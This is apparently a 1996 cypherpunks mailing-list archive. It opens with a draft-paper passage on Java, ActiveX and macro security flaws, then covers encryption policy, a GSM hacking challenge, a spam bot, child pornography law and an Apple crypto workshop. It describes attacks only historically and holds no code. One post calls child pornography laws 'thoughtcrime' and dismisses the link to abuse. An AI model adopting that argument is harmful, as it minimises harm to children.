Java problems can be combined with other attacks such as DNS spoofing (in which a fake address for a target machine is advertised), allowing a Java applet to connect to a normally disallowed target machine since the Java security manager thinks it is connecting to a safe system [Mueller 1996]. Other problems are less subtle, and can crash the browser (and, under some versions of Windows, the operating system as well) simply by connecting to a web page [Ref: Browser-crashing pages]. One report comes to the conclusion that "because of the wonderful power of the Java language, security problems are likely to continue" [Neumann 1996]. These problems are not unique to Java. Microsoft's ActiveX has experienced similar troubles, exemplified by a sample application which shuts down the machine, and even turns off the power on systems which support this functionality [McLain 1996]. The problems extend beyond Java and ActiveX to other kinds of embedded executable content as well. For example the ability to embed macros in documents viewed and downloaded by a browser, in combination with security holes in the browser, allows an attacker to execute arbitrary code on a victim's system whenever they view the attacker's web page [Felten 1996c]. Although this was subsequently fixed, the solution was to issue warnings for all local files as well as remote downloads, so that after the first dozen or so messages the user was likely to simply automatically click "OK" whenever another warning popped up [Walsh 1996]. In addition a hostile application could access the Windows registry (the system-wide database of configuration options) to quietly disable the warnings. This creates a nice niche for "espionage-enabling" viruses which disable or patch various security features in operating systems or application software to allow later attacks. At least one security organisation already uses such a program, a modified stealth virus, for this purpose.
-> Mention that these are all separate problems, not the same ref over and over.

[Clark 1996] Don Clark, "Researchers Find Big Security Flaw In Java Language", The Wall Street Journal, 26 March 1996, p.B4.
[Bloodmask 1996] `Bloodmask', "Vulnerability in ALL linux distributions", posting to linux-alert mailing list, 30 July 1996.
[Eastlake 1994] Donald Eastlake, Stephen Crocker, Jeffrey Schiller, "Randomness Recommendations for Security", RFC 1750, December 1994.
[Felten 1996a] Ed Felten, "Security Flaw in Netscape 2.02", Risks-Forum Digest Vol.18, Issue 13, 17 May 1996.
[Felten 1996b] Ed Felten, "Java security update", Risks-Forum Digest, Vol.18, Issue 32, 13 August 1996.
[Felten 1996c] Ed Felten, "Internet Explorer Security Problem", Risks-Forum Digest, Vol.18, Issue 36, 21 August 1996.
[Goldberg 1995] Ian Goldberg, "Netscape SSL implementation cracked!", posting to cypherpunks mailing list, message-ID: <199509180441.VAA16683 at lagos.CS.Berkeley.EDU>, 18 September 1995.
[Goldberg 1996] Ian Goldberg and David Wagner, "Randomness and the Netscape Browser", Dr.Dobbs Journal, January 1996, p.66.
[Green 1995] Heather Green, "Netscape Says Hackers Uncover 3rd Flaw in Its Internet Software", The New York Times, 25 Sep 1995.
[Hopwood 1996] David Hopwood, "Another Java security bug", posting to comp.lang.java newsgroup, message-ID <4orf1q$t6f at news.ox.ac.uk>, 2 June 1996.
[IEEE 1995] IEEE P1363 Appendix E, "Cryptographic Random Numbers", Draft version 1.0, 11 November 1995.
[Kennedy 1996] David Kennedy, "Another Netscape Bug US$1K", Risks-Forum Digest, Vol.18, Issue 1422, May 1996.
[Markoff 1995] John Markoff, "Security Flaw Is Discovered In Software Used in Shopping", The New York Times, 19 September 1995, p.A1.
[Markoff 1996] John Markoff, "New Netscape Software Flaw Is Discovered", The New York Times, 18 May 1996, p.31.
[McLain 1996] Fred McLain, "ActiveX, or how to put nuclear bombs in web pages", http://www.halcyon.com/mclain/ActiveX/.
[Mueller 1996] Marianne Mueller, "Java security", Risks-Forum Digest, Vol.17, Issue 79, 23 February 1996.
[Neumann 1995] Peter Neumann, "Third Netscape weakness found", Risks-Forum Digest, Vol.17, Issue 36, 27 September 1995.
[Neumann 1996] Peter Neumann, "More Java, JavaScript, and Netscape problems", in "Security Risks in Computer-Communication Systems", ACM SIGSAC Review, Vol.14, No.3 (July 1996), p.22.
[Plumb 1994] Colin Plumb, "Truly Random Numbers", Dr.Dobbs Journal, November 1994, p.113.
[RingZero 1995] `RingZero', "NEW Netscape RNG hole", posting to cypherpunks mailing list, message-ID <9510080732.AA14015 at anon.penet.fi>, 8 October 1995.
[Robertson 1995] Richard Robertson, "Random Number Generators Draft", IEEE P1363 Random Number Generators Review Group, May 1995.
[Sandberg 1995] Jared Sandberg, "Netscape's Internet Software Contains Flaw That Jeopardizes Security of Data", The Wall Street Journal, 19 September 1995.
[Spafford 1988] Gene Spafford, "The Internet Worm: Crisis and Aftermath", Communications of the ACM, Vol.32, No.6 (June 1989), p.678.
[Uhlig 1995] Robert Uhlig, "Security threat to Internet shopping", Daily Telegraph, Daily Telegraph (paper edition), 3 October 1995, p.12.
[unssl 1995] ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c.
[Walsh 1996] Mike Walsh, "Microsoft's warning", Risks-Forum Digest, Vol.18, Issue 38, 26 August 1996.
[Williams 1996] Eric Williams, "New Netscape 2.0/2.01 Security Issue (Java Sockets)", posting to comp.lang.java newsgroup, message-ID <4jppdt$ake at sky.net>, 1 April 1996.
[WSJ 1996] The Wall Street Journal, "Princeton Team Finds Bug In Part Of Netscape Program", 20 May 1996.

From frantz at netcom.com Wed Sep 11 14:54:19 1996
From: frantz at netcom.com (Bill Frantz)
Date: Thu, 12 Sep 1996 05:54:19 +0800
Subject: (Fnord) Edupage, 10 September 1996
Message-ID: <199609111822.LAA15291@netcom7.netcom.com>

I'm preaching to the choir, but I can't resist.
From Edupage, 10 September 1996:
>A leading Clinton Administration official ... Michael Nelson, who adds
>that organized crime members are already some of the most sophisticated
>users of computer systems and strong encryption technology. In addition,
>computer crackers will pose a more significant threat.

The bad guys already have strong encryption. So why doesn't the Clinton administration immediately press for the widespread deployment of strong encryption to help defend us against the bad guys?

-------------------------------------------------------------------------
Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting
(408)356-8506 | choice for best movie of | 16345 Englewood Ave.
frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA

From roger at coelacanth.com Wed Sep 11 15:16:02 1996
From: roger at coelacanth.com (Roger Williams)
Date: Thu, 12 Sep 1996 06:16:02 +0800
Subject: Hacking Mobil Telephone System ?
In-Reply-To:
Message-ID:

>>>>> Mark O Aldrich writes:

> On Wed, 11 Sep 1996, Stephan Schmidt wrote:
>> If a hacker is able to phone using the number
>> 0171 / 3 28 99 66 in Germany with a hacked code,
>> the company will pay 100.000 DM (~65.000$) to a non
>> profit organisation of the hackers choice.

> ... I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network. Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.

Um, that's 65 *thousand* bucks, which should pay the per diem for a week or so... ;-)

--
Roger Williams finger me for my PGP public key
Coelacanth Engineering consulting & turnkey product development
Middleborough, MA wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/

From zachb at netcom.com Wed Sep 11 16:23:24 1996
From: zachb at netcom.com (Z.B.)
Date: Thu, 12 Sep 1996 07:23:24 +0800
Subject: Hacking Mobil Telephone System ?
In-Reply-To:
Message-ID:

On Wed, 11 Sep 1996, Mark O.
Aldrich wrote:

> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network. Sixty

In Germany, the decimal point is used in place of the comma. So, 65.000$ would be $65,000 when you switch the notation to US figures.

---
Zach Babayco
zachb at netcom.com <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

From um at c2.net Wed Sep 11 16:25:51 1996
From: um at c2.net (Ulf Moeller)
Date: Thu, 12 Sep 1996 07:25:51 +0800
Subject: papers on anonymous protocols
In-Reply-To:
Message-ID:

Wei Dai writes:

> A. Pfitzmann, B. Pfitzmann, M. Waidner: ISDN-MIXes - Untraceable
> Communication with Very Small Bandwidth Overhead; Proc. Kommunikation
> in verteilten Systemen, Feb. 1991, Mannheim, Informatik-Fachberichte
> 267, Springer-Verlag, Heidelberg 1991, 451-463.
>
>describes a protocol for anonymous telephone calls.

The paper is at http://www.informatik.uni-hildesheim.de/FB4/Institute/Informatik/issi/sirene/publ/PfPW_91TelMixeGI_NTG.ps.gz

From ghio at c2.net Wed Sep 11 16:51:01 1996
From: ghio at c2.net (Matthew Ghio)
Date: Thu, 12 Sep 1996 07:51:01 +0800
Subject: 'robert' and his 'hipcrime' web site
In-Reply-To:
Message-ID: <199609111942.MAA18802@infinity.c2.org>

Moltar Ramone wrote:
> On Wed, 11 Sep 1996, John Anonymous MacDonald wrote:
[snip]
> > So basically this guy is a mathematician/artist trying
> > to pretend he's an anarchist.
>
> Like... oh... I dunno... una-something... :-) To be an "anarchist" has
> nothing to do with violence, necessarily, though. Gandhi was an
> anarchist, of course, as are many other people (such as myself) who
> disclaim violence as a tactic.
>
> > So we have a guy, probably with an education in mathematics, who likes
> > abstract art. Not what would generally be considered a political figure.
> > But there's something else there - something that doesn't want to be seen,
> > something that is very strongly law&order, something that doesn't
> > understand the anarchy of the net, and fears it.
>
> Disagree strongly. Are you aware of the source of the name 'hipcrime'?
> It's from John Brunner's novel _Stand_On_Zanzibar_ (A _great_ book, btw),
> and describes a cynical, hipster-societal dropout philosophy (or at least
> style) that is inclined to look at people as no more than sheep. Applying
> this to the 'net populace is perhaps (I hesitate somewhat to apply the
> term) misanthropic, but not necessarily law & order. Again, unabomber
> comparisons are obvious.

I'm not so sure about that. I suspect in Kaczynski's case it was attention deficit disorder and/or severe depression that drove him out into the woods where no one would bother him - he didn't like interruptions and shunned visitors. Kaczynski blamed "leftists" and "technologists" for his ills and primarily (though not exclusively) took out his rage on them.

This guy is just plain arrogant. He believes he's right, and if you don't agree with him and let him do whatever he wants, then to him you are unimportant scum. ("weak-minded soul" to quote him directly.)

What I don't understand is, why he bothered attacking the remailers. Since he obviously knows how to forge mail headers and write unix cgi scripts, and he wasn't trying to conceal the source address, using the remailers did him no good. Also, he could have just downloaded the remailer software and run it. So maybe he really is Co$...

From stewarts at ix.netcom.com Wed Sep 11 17:12:29 1996
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Thu, 12 Sep 1996 08:12:29 +0800
Subject: [WAS xs4all.nl] Terrorists
Message-ID: <199609112015.QAA01913@attrh1.attrh.att.com>

At 11:01 AM 9/9/96 +0200, Stephan wrote:
>One thought : How many of you would support terrorist
>web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?
But I _do_ support a terrorist web server! My taxes pay for CIA (odci.gov), whitehouse.gov, llnl.gov, *.mil, +1-888-ATF-FIRE ....

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From trei at process.com Wed Sep 11 17:19:07 1996
From: trei at process.com (Peter Trei)
Date: Thu, 12 Sep 1996 08:19:07 +0800
Subject: Hacking Mobil Telephone System ?
Message-ID: <199609111913.MAA16800@toad.com>

> On Wed, 11 Sep 1996, Stephan Schmidt wrote:
>
> > The German Company MobilCom wants to prove
> > that the German GSM networks D1,D2 and E+ are
> > secure.
> >
> > >
> > If a hacker is able to phone using the number
> > 0171 / 3 28 99 66 in Germany with a hacked code,
> > the company will pay 100.000 DM (~65.000$) to a non
> > profit organisation of the hackers choice.
> >
> > Is someone able to do this ? :)
>
> While there's dubious wisdom in trying to tell Der Polizei, "I was just
> responding to an authorization that I found on the Internet that says it's
> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network. Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.
> And Der Polizei is *NOT* known for having a sense of humor about anything,
> at any time, with anyone. Remember, kids, they may look like shit in
> uniform, but those automatic weapons they carry are real, so's the ammo,
> and they know how to use both of 'em.

The simple solution is to call the number from a regular phone, and find out if the offer is correct. I think you'll find that '100.000 DM (~65.000$)' is European nomenclature for '100,000 DM (~65,000$)'. The differences between US and European nomenclature can be subtle, yet important. Quick - which is likely to have had warmer weather: 1/8/96, or 8/1/96?
Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From jbugden at smtplink.alis.ca Wed Sep 11 17:26:47 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Thu, 12 Sep 1996 08:26:47 +0800
Subject: Hacking Mobil Telephone System ?
Message-ID: <9608118424.AA842483607@smtplink.alis.ca>

On Wed, 11 Sep 1996, Stephan Schmidt wrote:
> If a hacker is able to phone using the number
> 0171 / 3 28 99 66 in Germany with a hacked code,
> the company will pay 100.000 DM (~65.000$) to a non
> profit organisation of the hackers choice.

"Mark O. Aldrich" wrote:
>I'd also expect to get paid a hell of a lot more than $65 for doing a penetration test on their network.

Then how about a thousand times more than $65 US ? When was the last time Cents/Pfennigs were denominated in 1000ths of a Dollar/Mark? Ahh, maybe you are from Italy? ;-)

Ciao,
James

From admin at superhot.com Wed Sep 11 17:35:56 1996
From: admin at superhot.com (Admin)
Date: Thu, 12 Sep 1996 08:35:56 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609112124.PAA11039@rintintin.Colorado.EDU>

>This is an absurd and inaccurate analogy. The mailBot simply pushes
>*mailto:* tags that people have willingly placed on their public websites.
>They invite the mail so a more accurate analogy would be that City Hall puts
>up a public suggestion box and invites comments. The bot then puts one, and
>only one, unsigned anonymous suggestion into the box. It then goes on to the
>Art Gallery where they too have put up a public suggestion box, and the bot
>places one, and only one, anonymous suggestion in that box also...and it
>moves on to the next publicly accessible suggestion box that it finds, each
>time putting in one, and only one, message.
>
>Can the College-aged mind these days not develop a rational, concise,
>accurate and logical analogy that stays on point?
>
>Think about it...
or take down the public suggestion boxes if one doesn't >like what one finds inside. If you invite feedback...it will come. > >admin > > >There is >> >>HipCrime wrote: >>> Be honest, all you really care about is something which >>> "threatens the existence" your little baby. >> >>I think you were referring to yourself, Robert. :) >> >> >>Since you don't seem to understand the concept of spam very well yet, >>try this little experiment: >> >>Go downtown to City Hall and post advertisements for your website on >>all the walls and doors. Be sure to put one on the Mayor's office and >>all the members of the City Council. If they complain, explain to them >>why they are weak-minded souls who can't remove unwanted messages. >> >>Go to the local art gallery and post your signs all over. Tell people >>that since your web site is an "art project", that you are posting EXACTLY >>on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" >> >>Pass out survey forms. Ask people where they want to see advertisements. >>Go to these sites and spray-paint your http address. If people complain >>that you are "harassing" them, ask them why a whopping eighteen letters >>written on the wall is harassment. Tell them it's not *your* fault, >>that you're just doing what other people told you to. Explain how many >>trees you are saving by using spray-paint instead of paper. >> >>When the police handcuff you and take you away, complain that they are >>censoring you. Tell the judge that you want to sue the cops for violating >>your civil rights. While you're in jail, think about why what you did >>was wrong. <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. 
|| <>-----------------------1_303_692_5190------------------------<> From mpd at netcom.com Wed Sep 11 17:37:44 1996 From: mpd at netcom.com (Mike Duvos) Date: Thu, 12 Sep 1996 08:37:44 +0800 Subject: Child porn as thoughtcrime Message-ID: <199609111848.LAA28393@netcom11.netcom.com> Chuck Thompson writes: > The answer to the all the questions in the first set is > yes, in this country anyway, if they are interpreted by the > legal system as intending to incite illicit sexual acts, > fantasies or obsessions about children. The fantasies or > obsessions are assumed to lead to the illegal acts. The problem here is that they are "assumed" to do this as a matter of inerrant scripture, in spite of quite a bit of evidence indicating that this is not the case. It doesn't exactly send those under 18 a positive message about their bodies when it is suggested that capturing the slightest overt representation of their sexuality is a crime worthy of flaying and burning at the stake. I agree that persons should probably be protected from working as models or service providers in the commercial sex industry until they reach the age of majority. But the things that are being proposed these days look much more like an ideological purge of material relating to youthful sexuality than a serious attempt to protect children. The reasons given as justification are almost always overly vague. > Well, I'd say that anyone who benefits materially from the > distribution of child porn is exploiting either the > children, the pervert or both. The definition of "child porn" today is so excessively broad that it tramples on the notion of protected free speech and need not involve a "pervert." Since the alleged sexual exploitation of children is the one political issue no CongressRodent can afford to be seen as soft on, it is hardly surprising that this single issue will likely be the wedge used to successfully attack protected free speech. > Hold on here.. you are making an invalid comparison. 
To > my knowledge, there is no law against speaking in favor of > child porn, any more than there is against speaking in favor > of drug usage. It against the law to *use* either of them. But of course we aren't really talking about "speaking in favor of child porn." That's just the buzzword phrase used by the opposing side to characterize any argument against their proposals. We are talking about the right of citizens to privately converse with each other on any topic of their choosing, including through the use of visual material, without government interference. This is independent of the issue of child porn, and who is exploited when money is made through its distribution. > The argument is not dependent upon whether or not actual > children are used, any more than whether or not an actual > gun is used in a robbery - the net effect is the same. > Children are harmed by the promotion of child porn because > it leads to the abuse/exploitation of kids. This is a very vague and spurious connection, much like the suggestion that sympathetic views towards Communism in the '50s would lead to the overthrow of our government. Purging all depictions of adolescent sexuality from our society under threat of imprisonment is hardly a prudent public safety measure. > Let those who believe that they have a constitutional right > to "keep and bear child pornography" violate the various > laws and see if they can prove that their constitutional > rights are violated by the law which proscribes such things. Our constitution would be far better if it had a strong privacy provision, rather than the current First Ammendment. There will always be reasonable exceptions to the notion of absolute freedom of speech, and in every era, people will believe that their own pet issues, (Communism, Child Sex, Abortion Information), should be amongst the special exceptions made. 
In a country like Sweden, for instance, a constitutional amendment
would be required to ban private possession of any printed
material in a citizen's own home. Here, all it takes is some
grumbling by the child sex hysterics, and you can go to prison for
sitting at your kitchen table with scissors and a jar of paste, and
making a collage from selected pieces of the JC Penney Catalog and
the latest issue of Playboy.

Many so-called child porn laws are easily the silliest examples of
the "Tyranny of the Majority" and "thoughtcrime" ever to rear
their heads in modern times.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd at netcom.com  $    via Finger.                      $

From wsj-announce at interactive.wsj.com Wed Sep 11 17:43:53 1996
From: wsj-announce at interactive.wsj.com (The Wall Street Journal Interactive Edition)
Date: Thu, 12 Sep 1996 08:43:53 +0800
Subject: Important News from The Wall Street Journal Interactive Edition
Message-ID: <2.2.32.19960911141312.006aabc8@pop.dowjones.com>

Dear Wall Street Journal reader:

Your trial subscription to The Wall Street Journal Interactive Edition
ends in less than two weeks, on Sept. 21, 1996.

We hope you've had the chance to explore the Interactive Edition fully
during this extensive trial period. If not, visit us today at
http://wsj.com. Be sure to check out key features such as Personal
Journal, which enables you to create a personalized view of current
Journal news, and our extensive Company Briefing Books. A brief tour of
our most powerful features is at http://wsj.com/tour.htm.

If you wish to continue with your subscription after the trial ends, you
don't need to re-register. Just fill out a brief online form and provide
us with payment information; we won't charge your credit card until
after our trial period is over. An annual subscription costs just $49 a
year, or $29 a year if you subscribe to any print edition of The Wall
Street Journal. To convert to an annual subscription, just access
http://wsj.com and click on the "Convert Now" graphic.

If you do not wish to convert to an annual subscription, you do not need
to do anything -- you will not be billed and your subscription will be
canceled automatically at the end of the trial.

You may also be interested in a special offer available to users of
Microsoft's Internet Explorer. Microsoft has made arrangements with
several premier publishers on the Web, including the Interactive
Edition, to offer subscriptions to Internet Explorer users at no charge
through the end of this year. If you use the latest release of Internet
Explorer as your Web browser, you will be able to keep reading the
Interactive Edition through Dec. 31, 1996 and there is no need for you
to provide us with payment information at this time. For more
information on this offer, you can visit http://wsj.com/ie.html or ask
us questions at the e-mail address below.

We hope you'll stay with us as a charter annual subscriber. The coming
months will see continued progress and expansion on all fronts in the
Interactive Edition -- with more Briefing Books, an improved and
enhanced Personal Journal, more exclusive news coverage, a greatly
expanded search archive and a variety of new tools that we hope will
make keeping track of the news easier and more enjoyable.

If you have questions or comments, e-mail us at the address below or
call Customer Service at 1-800-369-2834 or 1-609-514-0870.

Neil Budde
Editor
The Wall Street Journal Interactive Edition
info at interactive.wsj.com

--------------------------------------------------------
The WSJ-ANNOUNCE3 list is a service of The Wall Street Journal
Interactive Edition (http://wsj.com). If you no longer wish to
receive messages from the WSJ-ANNOUNCE3 list, simply reply to
this message and in the body of your message type:
UNSUBSCRIBE WSJ-ANNOUNCE3

From declan at well.com Wed Sep 11 17:46:04 1996
From: declan at well.com (Declan McCullagh)
Date: Thu, 12 Sep 1996 08:46:04 +0800
Subject: The definition of child pornography -- no help here
Message-ID:

[Note this was before Knox. --Declan]

NEW YORK v. FERBER

No. 81-55

SUPREME COURT OF THE UNITED STATES

458 U.S. 747; 102 S. Ct. 3348; 1982 U.S. LEXIS 12; 73 L. Ed. 2d 1113;
50 U.S.L.W. 5077; 8 Media L. Rep. 1809

April 27, 1982, Argued
July 2, 1982, Decided

PRIOR HISTORY: [***1] CERTIORARI TO THE COURT OF APPEALS OF NEW YORK.

DISPOSITION: 52 N. Y. 2d 674, 422 N. E. 2d 523, reversed and remanded.

SYLLABUS: A New York statute prohibits persons from knowingly promoting
a sexual performance by a child under the age of 16 by distributing
material which depicts such a performance. The statute defines "sexual
performance" as any performance that includes sexual conduct by such a
child, and "sexual conduct" is in turn defined as actual or simulated
sexual intercourse, deviate sexual intercourse, sexual bestiality,
masturbation, sado-masochistic abuse, or lewd exhibition of the
genitals. Respondent bookstore proprietor was convicted under the
statute for selling films depicting young boys masturbating, and the
Appellate Division of the New York Supreme Court affirmed. The New York
Court of Appeals reversed, holding that the statute violated the First
Amendment as being both underinclusive and overbroad. The court reasoned
that in light of the explicit inclusion of an obscenity standard in a
companion statute banning the knowing dissemination of similarly defined
material, the statute in question could not be construed to include an
obscenity standard, [***2] and therefore would prohibit the promotion of
materials traditionally entitled to protection under the First
Amendment.
Held: As applied to respondent and others who distribute similar
material, the statute in question does not violate the First Amendment
as applied to the States through the Fourteenth Amendment. Pp. 753-774.

(a) The States are entitled to greater leeway in the regulation of
pornographic depictions of children for the following reasons: (1) the
legislative judgment that the use of children as subjects of
pornographic materials is harmful to the physiological, emotional, and
mental health of the child, easily passes muster under the First
Amendment; (2) the standard of Miller v. California, 413 U.S. 15, for
determining what is legally obscene is not a satisfactory solution to
the child pornography problem; (3) the advertising and selling of child
pornography provide an economic motive for and are thus an integral part
of the production of such materials, an activity illegal throughout the
Nation; (4) the value of permitting live performances and photographic
reproductions of children engaged in lewd exhibitions is exceedingly
modest, if [***3] not de minimis; and (5) recognizing and classifying
child pornography as a category of material outside the First
Amendment's protection is not incompatible with this Court's decisions
dealing with what speech is unprotected.

[...]

******

Copyright (c) 1994 Albany Law Journal of Science & Technology
Albany Law Journal of Science & Technology

1994

4 Alb. L.J. Sci. & Tech. 311

LENGTH: 10368 words

COMMENTS: WHY THE POSSESSION OF COMPUTER-GENERATED CHILD PORNOGRAPHY CAN
BE CONSTITUTIONALLY PROHIBITED

David B. Johnson

TEXT:

[*312] I. INTRODUCTION

The computer revolution is sweeping across the world. Like the
Industrial Revolution of the nineteenth and early twentieth century, the
computer has brought and will continue to bring profound changes to our
society. In many instances, computer technology has advanced faster than
the laws governing it. n1 Some critics fear that computer technology is
growing so fast that "society will be . . . unprepared [to deal with]
the moral and legal havoc it will create and the questions it will pose
for human identity and privacy." n2 The computer revolution already has
brought society its fair share of moral and legal havoc. n3 However,
what is to come will tax society's moral and legal systems on an even
greater scale.

[...]

From rah at shipwright.com Wed Sep 11 17:59:24 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 12 Sep 1996 08:59:24 +0800
Subject: Mac Crypto Conf - Debrief
Message-ID:

--- begin forwarded text

Mime-Version: 1.0
Date: Tue, 10 Sep 1996 17:57:05 -0700
To: mac-crypto at thumper.vmeng.com
From: Vinnie Moscaritolo
Subject: Mac Crypto Conf - Debrief

Yow! - We did it....

On Sept 5th & 6th, here on the Cupertino R&D Campus, Robert Hettinga
from Shipwright and I ran "The First-Ever-Last-Minute-Under-the-Radar-
Ask-Forgiveness-but-Not-Permission Macintosh Cryptography and Internet
Commerce Software Development Workshop"

This workshop was driven by the copious feedback that I have received
from developers from both DTS and personal emails, WWDC and MacHack and
the Mac-Crypto mailing list. Since the ability to perform Internet
Commerce depends heavily on both networking and cryptographic
technologies, I started the Mac-Crypto mailing list last March to
discuss the implementation of cryptography on the MacOS.

We had three major goals for this event:

1) We wanted to provide a vehicle to educate Apple developers and
employees who are responsible for Apple's future on the internet about
what is going on in the Internet commerce world. We also felt the need
to get Internet commerce on Apple's radar. It was clearly on Microsoft's
agenda. Developer feedback made it loud and clear that we are losing and
have lost developers to other platforms because of it. We are going to
fix that.

2) To assist in bridging any disconnect between what the developers have
been asking us for and what we are giving them in the internet commerce
world.
3) To provide a forum where developers can work together to create
internet commerce products for the Macintosh platform. In a manner
similar to Quinn's Internet Config, we believed that a lot of this
infrastructure can be built by the developers themselves.

Highlights:

I posted an invite webpage at
http://webstuff.apple.com/~opentpt/crypto.html and advertised on several
mailing lists, within 10 days I had 84 registrations, about 70 of which
showed. Some attendees actually traveled from as far as Scotland.

The sessions (in no particular order):

* Phil Zimmermann / PGP Inc - Keynote.
* Bill Frantz / Periwinkle - Introduction to Cryptography
* Maxine Curry / Apple - Crypto Software and the Commerce Dept.
* Jon Callas / Apple - Random Numbers on the Mac
* Pablo Calamera / Apple - Feedback: Mac Crypto API?:
* Sari Harrison / Apple - Feedback: Internet API?
* Vinnie Moscaritolo / Apple - Building Fast Network Server Software on MacOS
* Quinn / Apple - Internet Config as a Development Model
* Vinnie Moscaritolo / Apple - Proposal for bringing back the Mac Keychain
* Jay Van Vark / Pacific Coast - How to use electronic commerce
* Michel Ranger / Entrust - Certificate and Trust Management
* Marc Briceno/Digicash - Digital Cash and Digital Bearer Certificates
* Robert Hettinga / Shipwright - A look over the edge
* Dave Del Torto   - Cypherpunks, MCIP and Mac-Crypto:
  Marshall Clow      a history of crypto activism and the Mac
  Greg Broiles

The sessions were a real success. There was a lot of enthusiasm from the
developers. The speakers were great. I received comments that the
developers found the workshop was very accessible; there was a lot of
interaction between the audience and speakers. We allocated plenty of
time for Q&A and discussions. They wished that WWDC was more like this.

Some of the highlights were:

- Phil Zimmermann of PGP fame talked about his plans to build a
  commercial version of PGP, PGPPhone and CryptDisk on the Mac. And a
  Mac PGP library that developers can use in their products.

- Jon Callas's session generated much excitement. Developers appreciated
  that his work will be available in source code.

- Quinn's session described the hurdles he encountered in shipping
  Internet Config, one of the most successful pieces of mac software. I
  would consider this talk a must-watch for any evangelist or product
  mgr, there is a lot Apple can learn from him.

- Sari and Pablo seemed to restore some faith to developers that Apple
  does listen to their concerns. I got a lot of positive feedback about
  their willingness to listen to developers.

- I gave a talk about what is involved in designing fast network servers
  with OpenTransport. I wanted to remove any misconception that MacOS is
  not a good server platform. I outlined the workarounds to some of the
  problems that existing products have encountered. Thanks to the
  feedback I received I plan to give this talk again to Apple engineers.

- Marc from DigiCash was very knowledgeable about uses for digital cash.
  One that I was surprised by was to drastically lower bookkeeping costs
  from internal corporate budget management. Here is a place where Apple
  could lead.

- Robert Hettinga gave a great lecture on the future of commerce and
  money on the net. It's impossible to talk to him for 10 minutes and
  not learn something. He is a "natural born evangelist" and would be a
  great asset to Apple.

- Sidhu volunteered to lead an effort to resurrect a developer-accessible
  keychain that can be used as a single log-in point to secure services.

- There were even a few impromptu sessions from the developers.

I wished that more Apple folks could have been there to absorb some of
the developer feedback. Luckily Bob and I also worked the video room in
between giving our sessions and introductions and were able to tape most
of the sessions. I am working on making them available. I will also try
to make the slides available on a more permanent webpage in a few days.
(I'll post on Mac Crypto)

Kudos

I want very much to thank the individuals that made this workshop
possible.

* Robert Hettinga from Shipwright - For his personal time and cost to
  fly out from Boston, mustering up the developers on the net,
  assembling the talks, giving the talks, educating us all, doing video
  booth duty, and everything else. Imagine what we could do with an army
  of folks like you. (scares me)

* Jose Carreon - For understanding the importance of internet commerce
  to Apple's future and arranging what was needed to make this event
  happen.

* Beth Reed / Yolanda Saldana / Robin Wagner / Richard Ford - For all
  the help organizing coordinating and firefighting behind the scenes
  (and holding the bail money). We wouldn't have been able to do it
  without you.

* Cynthia Zwerling - for the fantastic artwork, web design, T-Shirts,
  and for dealing with all our last minute notices.

* And a personal thanks to all the speakers, for taking the time off
  their busy schedules to give great presentations.

* And most of all, a big thank you to the developers for believing in
  Apple.

Ciao.

Vinnie Moscaritolo
Apple Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From gary at systemics.com Wed Sep 11 18:08:01 1996
From: gary at systemics.com (Gary Howland)
Date: Thu, 12 Sep 1996 09:08:01 +0800
Subject: Hacking Mobil Telephone System ?
In-Reply-To:
Message-ID: <32371250.3F54BC7E@systemics.com>

Mark O. Aldrich wrote:
>
> While there's dubious wisdom in trying to tell Der Polizei, "I was just
> responding to an authorization that I found on the Internet that says it's
> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network. Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.

These continental europeans tend to type '.' instead of commas, and
',' instead of points when they write numbers. (They also have funny
ones and sevens, but that's another story.)

I thought the offer of 100,000 DM very respectable, and a tad unusual
for a [usually conservative] telecoms company. It sure beats baseball
caps and T-shirts.

> And Der Polizei is *NOT* known for having a sense of humor about anything,
> at any time, with anyone.

I 100% agree ...

> Remember, kids, they may look like shit in
> uniform, but those automatic weapons they carry are real, so's the ammo,
> and they know how to use both of 'em.

... but the semi automatics they carry are not much different to ones
US cops have.

> And *I'll* decide if and when I want to give it to charity, just like I do
> with the rest of my salary, thank you....

And *they'll* decide what sort of deal *they* want to offer. They
did say the money could be donated to any non-profit organisation,
so this covers a wide range of organisations (your school or university
perhaps, or computer society, or even the Church of Scientology, The
Vatican, Mitre Corp, NFL, etc. etc.).

I wonder if Radikal is a non-profit :-)

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now." -- Unknown.

pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

